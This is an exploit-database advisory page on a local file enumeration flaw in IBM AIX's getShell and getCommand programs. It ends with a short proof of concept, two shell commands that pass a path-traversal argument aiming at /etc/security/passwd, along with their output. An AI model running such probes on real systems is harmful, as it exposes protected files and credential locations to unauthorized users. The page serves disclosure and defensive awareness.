header-logo
Suggest Exploit
vendor:
IBM AIX
by:
5.5
CVSS
MEDIUM
Local File Enumeration
CWE
Product Name: IBM AIX
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Local File Enumeration in IBM AIX

The vulnerability allows local attackers to enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. An attacker can exploit this issue by using a specially crafted input to the 'getShell' or 'getCommand' function, allowing them to view files that would normally be inaccessible.

Mitigation:

No known mitigation is available at the time of writing. It is advised to monitor and restrict access to sensitive files and directories.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16102/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory